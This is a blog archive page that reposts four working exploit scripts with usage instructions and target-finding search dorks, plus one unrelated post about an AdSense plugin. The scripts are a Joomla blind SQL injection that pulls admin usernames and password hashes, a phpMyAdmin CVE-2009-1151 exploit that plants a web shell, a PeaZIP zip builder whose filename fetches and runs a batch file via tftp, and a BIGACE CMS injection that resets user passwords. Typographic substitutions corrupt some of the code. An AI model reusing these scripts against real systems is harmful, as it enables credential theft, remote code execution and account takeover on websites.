Feb 26

Joomla Component com_joomlaconnect_be Blind Injection Vulnerability

By jason Security Tools No Comments »

Test Code


#!/usr/bin/php
  <?php 

ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

if ($argc > 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

$t = abs((100-($w/$r*100))); 

echo "Username: "; 

for ($i=1; $i <= 30; $i++) { 

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); 

   if (abs((100-($laenge/$r*100))) > $t-1) { 

      $count = $i; 

      $i = 30; 

   } 

} 

for ($j = 1; $j < $count; $j++) { 

   for ($i = 46; $i <= 122; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 122; 

      } 

   } 

} 

echo "\nPassword: "; 

for ($j = 1; $j <= 49; $j++) { 

   for ($i = 46; $i <= 102; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 102; 

      } 

   } 

} 

} 

?>
Tagged with:
Jul 22

Wordpress Adsense Injection : Randomly Insert Ads in Posts

By jason Wordpress Plugins 156 Comments »

Ad blindness is a common problem, which makes your visitors ignore your similar looking and always single position google adsense ads. Adsense Injection wordpress plugin will let you insert ads randomly in your post, reduce ad blindness and increase clicks.

Earlier I had pointed to another excellent AdSense Deluxe WordPress Pluginthat lets you insert Google Adsense / Yahoo Ads into blog posts easily. But there were no random ads insertion and you decided where to insert the ads.

The new Adsense Injection wordpress plugin just takes a random paragraph break in your article and inserts google adsense code. It does one per story. It lets you pick how many total ads to do (0-3) and it lets you pick the formats and colors you want it to randomly select from. You can see it at work on their blog. A very good idea, but may cause ads to appear in funny places , especially if you use a lot of images in posts, as you have less control on ad placement now.

Now if you are looking out for Google Adsense Secrets, this is one of them.

Tagged with:
Jun 09

phpMyAdmin PHP Code Injection Exploit

By jason Security Tools No Comments »

# CVE-2009-1151: phpMyAdmin ‘/scripts/setup.php’ PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the ‘/config/’ directory
# within the ‘/phpMyAdmin/’ directory. this is because this directory is
# where ‘/scripts/setup.php’ tries to create ‘config.inc.php’ which is where
# our evil PHP code is injected .

#!/bin/bash

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
    echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
    echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
    exit
fi

if ! which curl >/dev/null
then
    echo "sorry but you need curl for this script to work!"
           echo "on Debian/Ubuntu: sudo apt-get install curl"
           exit
fi

function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

    flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
    echo "[+] attempting to inject phpinfo() …"
    curl -ks -b $2 -d "$postdata" –url "$3/scripts/setup.php" >/dev/null

    if curl -ks –url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
    then
        curl -ks –url "$3/config/config.inc.php" >$flag   
        echo "[+] success! phpinfo() injected successfully! output saved on $flag"
        curl -ks -b $2 -d $postdata2 –url "$3/scripts/setup.php" >/dev/null
        echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
        echo "    $3/config/config.inc.php?c=ls+-l+/"
        echo "    $3/config/config.inc.php?p=phpinfo();"
        echo "    please send any feedback/improvements for this script to"\
        "unknown.pentester<AT_sign__here>gmail.com"
    else
        echo "[+] no luck injecting to $3/config/config.inc.php :( "
        exit
    fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar –url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided …"

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
    length=`echo -n $token | wc -c`

    # valid form token obtained?
    if [[ $length -eq 32 ]]
    then
        echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
        # attempt exploit!
        exploit $token $cookiejar $1
    else
        echo "[+] could not grab form token. you might want to try exploiting the vuln manually :( "
        exit
    fi
else
    echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
    exit
fi

Tagged with:
Jun 07

PeaZIP commpressed filename command injection poc exploit

By jason Security Tools No Comments »

PeaZIP <= 2.6.1 commpressed filename command injection poc exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
software site: http://peazip.sourceforge.net/

tested against: peazip 2.5.1, 2.6.1 for Windows

a pipe vulnerability exists in the way peazip handles file entries,
prepare the .zip file, open with it, then double click the compressed text file,
a cmd shell is launched …

<?php

#change, cannot use slashes or backslashes here
$cmd = "tftp 192.168.0.1 GET pyro pyro.bat & pyro.bat";

class zipfile
{
    var $datasec      = array();
    var $ctrl_dir     = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset   = 0;

    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

        if ($timearray['year'] < 0×7bc) {
            $timearray['year']    = 0×7bc;
            $timearray['mon']     = 1;
            $timearray['mday']    = 1;
            $timearray['hours']   = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }

        return (($timearray['year'] – 0×7bc) << 0×19) | ($timearray['mon'] << 0×15) | ($timearray['mday'] << 0×10) |
                ($timearray['hours'] << 0xb) | ($timearray['minutes'] << 0×5) | ($timearray['seconds'] >> 0×1);
    }

    function addFile($data, $name, $time = 0)
    {
        $time= (int) $time;
        $name     = str_replace(‘\\’, ‘/’, $name);
        $dtime    = dechex($this->unix2DosTime($time));
        $hexdtime = ‘\x’ . $dtime[6] . $dtime[7]
                  . ‘\x’ . $dtime[4] . $dtime[5]
                  . ‘\x’ . $dtime[2] . $dtime[3]
                  . ‘\x’ . $dtime[0] . $dtime[1];
        eval(‘$hexdtime = "’ . $hexdtime . ‘";’);

        $fr   = "\x50\x4b\x03\x04";
        $fr   .= "\x14\x00";            // ver needed to extract
        $fr   .= "\x00\x00";            // gen purpose bit flag
        $fr   .= "\x08\x00";            // compression method
        $fr   .= $hexdtime;             // last mod time and date

        // "local file header" segment
        $unc_len = strlen($data);
        $crc     = crc32($data);
        $zdata   = gzcompress($data);
        $zdata   = substr(substr($zdata, 0, strlen($zdata) – 4), 2); // fix crc bug
        $c_len   = strlen($zdata);
        $fr      .= pack(‘V’, $crc);             // crc32
        $fr      .= pack(‘V’, $c_len);           // compressed filesize
        $fr      .= pack(‘V’, $unc_len);         // uncompressed filesize
        $fr      .= pack(‘v’, strlen($name));    // length of filename
        $fr      .= pack(‘v’, 0);                // extra field length
        $fr      .= $name;

        $fr .= $zdata;
        $this -> datasec[] = $fr;

        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";                // version made by
        $cdrec .= "\x14\x00";                // version needed to extract
        $cdrec .= "\x00\x00";                // gen purpose bit flag
        $cdrec .= "\x08\x00";                // compression method
        $cdrec .= $hexdtime;                 // last mod time & date
        $cdrec .= pack(‘V’, $crc);           // crc32
        $cdrec .= pack(‘V’, $c_len);         // compressed filesize
        $cdrec .= pack(‘V’, $unc_len);       // uncompressed filesize
        $cdrec .= pack(‘v’, strlen($name)); // length of filename
        $cdrec .= pack(‘v’, 0);             // extra field length
        $cdrec .= pack(‘v’, 0);             // file comment length
        $cdrec .= pack(‘v’, 0);             // disk number start
        $cdrec .= pack(‘v’, 0);             // internal file attributes
        $cdrec .= pack(‘V’, 32);            // external file attributes – ‘archive’ bit set

        $cdrec .= pack(‘V’, $this -> old_offset); // relative offset of local header
        $this -> old_offset += strlen($fr);

        $cdrec .= $name;

        $this -> ctrl_dir[] = $cdrec;
    }

    function file()
    {
        $data    = implode(”, $this -> datasec);
        $ctrldir = implode(”, $this -> ctrl_dir);

        return
            $data .
            $ctrldir .
            $this -> eof_ctrl_dir .
            pack(‘v’, sizeof($this -> ctrl_dir)) .  // total # of entries "on this disk"
            pack(‘v’, sizeof($this -> ctrl_dir)) .  // total # of entries overall
            pack(‘V’, strlen($ctrldir)) .           // size of central dir
            pack(‘V’, strlen($data)) .              // offset to start of central dir
            "\x00\x00";                             // .zip file comment length
    }

}

$zipfile = new zipfile();
$zipfile -> addFile("lol","../../../../../../../\" README.TXT \" ".str_repeat("\x20",0xde – strlen($cmd))."\" | $cmd | .txt");
$dump_buffer = $zipfile -> file();
assert(file_put_contents("9sg.zip",$dump_buffer));
?>

Tagged with:
May 13

BIGACE CMS 2.5 Remote SQL Injection Exploit

By jason Security Bulletin No Comments » 
#!/usr/bin/perl
#***********************************************************************************************
#***********************************************************************************************
#**	       										      **
#**  											      **
#**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
#**     || || ||  []        [][]   []   []  []     []   []      [] []   []	  []    []    **
#   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
#**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
#**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
#   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []
#**							                                      **
#**    											      **
#**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
#**					  ¡PROUD TO BE SPANISH!	                              **
#**											      **
#***********************************************************************************************
#***********************************************************************************************
#
#----------------------------------------------------------------------------------------------
#|       (Post Form --> User register (username)) User options changer (SQLi) EXPLOIT	      |
#|--------------------------------------------------------------------------------------------|
#|                          |   Bigace CMS -stable release- 2.5    |		              |
#|  CMS INFORMATION:         --------------------------------------			      |
#|										              |
#|-->WEB: http://www.bigace.de/			   		              		      |
#|-->DOWNLOAD: http://downloads.sourceforge.net/bigace/				              |
#|-->DEMO: http://www.bigace.de/demo.html						      |
#|-->CATEGORY: CMS / Blogging								      |
#|-->DESCRIPTION: BIGACE is an easy-to-use multisite, multilanguage and multiuser             |
#| 		Web CMS, written for PHP/MySQL.Uses FCKeditor for HTML editing...	      |
#|-->RELEASED: 2009-04-27								      |
#|											      |
#|  CMS VULNERABILITY:									      |
#|											      |
#|-->TESTED ON: firefox 3                                				      |
#|-->DORK: "Powered by BIGACE 2.5"							      |
#|-->CATEGORY: USER OPTIONS CHANGER/ SQL INJECTION/ PERL EXPLOIT			      |
#|-->AFFECT VERSION: LAST = 2.5 (Maybe <= ?)		            			      |
#|-->Discovered Bug date: 2009-04-27							      |
#|-->Reported Bug date: 2009-04-27							      |
#|-->Fixed bug date: 2009-05-04								      |
#|-->Info patch (2.6): http://www.bigace.de/BIGACE-2.6.html				      |
#|-->Author: YEnH4ckEr									      |
#|-->mail: y3nh4ck3r[at]gmail[dot]com							      |
#|-->WEB/BLOG: N/A									      |
#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)		      |
#----------------------------------------------------------------------------------------------
#
#------------
#CONDITIONS:
#------------
#
#**gpc_magic_quotes=off
#
#-----------------
#PRE-REQUIREMENTS
#-----------------
#
#Package --> allow.self.registration --> True (Default value)
#
#-------
#NEED:
#-------
#
#**valid username
#
#**real captcha code/img
#
#**maybe PHPSESSID (with securimage captcha plugin)
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#Register module (username option) is vuln to sql injection.
#
#Username --> Proof of concept','password','thisisthelanguage')%23
#
#Other parameters --> something
#
#
#---------------------------------------
#EXPLOIT (SQL INJECTION):
#---------------------------------------
#
#If you find a valid username, it can use --> "ON DUPLICATE KEY UPDATE column=value",
#
#this clause updates the previous row if a unique index is affected (username) and
#
#doesn't insert a new row. So (username=admin --> valid user):
#
#Username --> admin','any','any') ON DUPLICATE KEY UPDATE password=MD5(12345)%23
#
#Other parameters --> something
#
#If username=admin exists then, his password is changed to 12345!
#
#---------------------------------------
#INSTRUCTIONS:
#---------------------------------------
#
#Go to vuln web --> user register
#
#Copy the captcha image name/sid:
#
#For example --> b2evo_captcha_e24cf14f6a03283413dfb7133624a39e  --> Use the b2evo captcha!
#
#For example --> ead9c0aa4822c265b346c67390b7235d  --> Use the securimage captcha!
#
#Copy the captcha text. For example --> WEGKA
#
#Search a valid user. For example --> admin
#
#Choose a column. Possibilities: id,cid,email,username,password,language or active.
#
#Introduce a value for this column.
#
#If captcha uses securimage also you need PHPSESSID to exploit.
#
#Launch the exploit!
#
#Note: If username isn't valid, ie, he doesn't exist then, a new invalid user is inserted.
#
#
#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##   GREETZ TO: JosS, Ulises2k and all SPANISH Hack3Rs community!    ##
##*******************************************************************##
#######################################################################
#######################################################################
#
use LWP::UserAgent;
use HTTP::Request;
 use Digest::MD5 qw(md5_hex);
#Subroutines
sub lw
{
	my $SO = $^O;
	my $linux = "";
	if (index(lc($SO),"win")!=-1){
		$linux="0";
	}else{
		$linux="1";
	}
	if($linux){
		system("clear");
	}
	else{
		system("cls");
		system ("title BIGACE CMS 2.5 (User Options changer) Exploit");
		system ("color 02");
	}
}
sub request {
	my $userag = LWP::UserAgent->new;
	$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
	my $request = HTTP::Request -> new(POST => $_[0]);
	if($_[2] == 1){
	#Securimage needs PHPSESSID
	$request->header(cookie => "PHPSESSID=".$_[3]);
	}
	#I need referer for captcha
	$request->referer($_[0]);
	$request->content_type('application/x-www-form-urlencoded');
	$request->content($_[1]);
	my $outcode= $userag->request($request)->as_string;
	return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
	print "\tWeb isn't vulnerable!\n\n";
	print "\t--->Maybe:\n\n";
	print "\t\t1.-Patched or magic_quotes_gpc=ON.\n";
	print "\t\t2.-User doesn't exist.\n";
	print "\t\t3.-Error in captcha code or image.\n";
	print "\t\t4.-Column doesn't exist.\n";
	print "\t\t5.-Bad path or host.\n";
	print "\t\t6.-Repeat captcha with option 1 (securimage).\n\n";
	print "\t\tEXPLOIT FAILED!\n";
	print "\t------------------------------------------------------------\n";
}
sub helper {
	print "\n\t[!!!] BIGACE-CMS--stable-release-2.5-->(User Options) Exploit\n";
	print "\t[!!!] USAGE MODE: [!!!]\n";
	print "\t[!!!] perl $0 [HOST] [PATH] [Type Captcha] [Captcha/ssid img] [Captcha code] [Column] [Value] [User]\n";
	print "\t[!!!] [HOST]: Web.\n";
	print "\t[!!!] [PATH]: Home Path.\n";
	print "\t[!!!] [Type Captcha]: B2Evo --> 0. Securimage --> 1. Default: 0\n";
	print "\t[!!!] [Captcha/ssid img]: Img captcha name (0) or Img ssid name (1).\n";
	print "\t[!!!] [Captcha code]: Captcha text.\n";
	print "\t[!!!] [Column]: email,active(0/1),username,password,id,cid or language\n";
	print "\t[!!!] [Value]: Set changed value\n";
	print "\t[!!!] [User]: Username to change\n";
	print "\t[!!!] [PHPSESSID]: Securimage needs PHPSESSID.\n";
	print "\t[!!!] Example-1: perl $0 'www.example.es' 'bigace' '0' 'b2evo_captcha_ed5c10cb69be1ee9340b3743c8718fe2'\n";
    print "\t[!!!]       'EWZ3L' 'password' '12345' 'admin'\n";
	print "\t[!!!] Example-2: perl $0 'www.example.es' 'bigace' '1' '6f15b93e170f5f5e50922361b06d228d'\n";
    print "\t[!!!]       'EWZ3' 'password' '12345' 'admin' 'u3h7on9taiihpbm51roeqqq2q2'\n";
	print "\t[!!!] Note: If option 0 is available you can use this captcha code to change more options!\n\n";
}
#Main
&lw;
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
print "\t##   BIGACE CMS 2.5 - (User Options changer) Exploit ##\n\n";
print "\t##       ++Conditions: magic_quotes=off              ##\n\n";
print "\t##       ++Needed: Username to change                ##\n\n";
print "\t##       ++Needed: Valid captcha img/code            ##\n\n";
print "\t##             Author: Y3nh4ck3r                     ##\n\n";
print "\t##     Contact:y3nh4ck3r[at]gmail[dot]com            ##\n\n";
print "\t##            Proud to be Spanish!                   ##\n\n";
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
#Init variables
my $host=$ARGV[0];
my $path=$ARGV[1];
my $img=$ARGV[3];
my $code=$ARGV[4];
my $columns=$ARGV[5];
my $values=$ARGV[6];
my $username=$ARGV[7];
if(($ARGV[2]==0) || ($ARGV[2]==1)){
	$option=$ARGV[2];
	$numArgs = $#ARGV + 1;
	if($numArgs<=7)
	{
		&helper;
		exit(1);
	}
}else{
	$option=0;
	$numArgs = $#ARGV + 1;
	if($numArgs<=6)
	{
		&helper;
		exit(1);
	}
}
if($columns eq "password"){
	$values=md5_hex($values); #pass in md5
}
#Build the uri
my $finalhost="http://".$host."/".$path."/index.php?cmd=application&id=-1_tauth_kregister_len";
#Check all variables needed
#sql injection
$injection=$username."','any','any') ON DUPLICATE KEY UPDATE ".$columns."='".$values."'%23";
#build posts with injection
if($option==0){
$post="register=do&validate=http://".$host."/".$path."/addon/b2evo/b2evo_captcha_tmp/".$img.".jpg&username=";
$PHPSESSID="nothing";
}else{
$post="register=do&validate=http://".$host."/".$path."/addon/securimage/show_captcha.php?sid=".$img."&username=";
$PHPSESSID=$ARGV[8];
}
$post.=$injection."&language=en&email=y3nh4ck3r@gmail.com&password=xxxxxxxxxxx&pwdrecheck=xxxxxxxxxxx&captcha=".$code."&sumbit=Create";
$output=&request($finalhost, $post, $option, $PHPSESSID);
#processed
if($output!~(/Title: 404 Not Found/))
{
	if ($output!~(/\<div align=\"center\" id=\"registerError\"\>/))
	{
		print "\n\t---------------------------------------------------------------\n";
		print "\t--  EXPLOIT EXECUTED (BIGACE CMS 2.5 User Options changer)   --\n";
		print "\t---------------------------------------------------------------\n\n";
		print "\t\tUser option changed!\n\n";
		print "\t\tOption changed: ".$columns."\n";
		print "\t\tNew value: ".$values."\n\n";
		print "\t\tIf username isn't real, you add a new inconsistent active user!\n\n";
		print "\t\tNote: If option 0 is available you can use this captcha code\n";
		print "\t\tto change more options!\n\n";
		print "\n\t<<<<<<----------------------FINISH!---------------->>>>>>>>\n\n";
		print "\t<<<<<<--------------Thanks to: y3hn4ck3r------------>>>>>>>\n\n";
		print "\t<<<<<<-----------------------EOF-------------------->>>>>>>\n\n";
	}else{
	&error;
	}
}else{
	&error;
}
exit(1);
#Ok...all job done
Tagged with:
preload preload preload